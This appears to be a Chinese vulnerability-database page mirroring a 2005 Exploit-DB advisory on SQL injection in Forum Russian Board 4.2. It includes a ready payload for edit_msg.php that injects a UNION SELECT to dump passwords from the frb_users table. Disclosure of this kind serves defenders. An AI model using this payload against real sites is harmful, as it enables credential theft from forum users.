CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection

CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection

漏洞ID 1055186 漏洞类型
发布时间 2005-06-23 更新时间 2005-06-23
图片[1]-CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25891
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14045/info
              
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
              
Forum Russian Board 4.2 is reported to be affected. 

edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*

相关推荐: cPanel 5-9 – Passwd SQL Injection

cPanel 5-9 – Passwd SQL Injection 漏洞ID 1054489 漏洞类型 发布时间 2004-06-09 更新时间 2004-06-09 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/A |漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享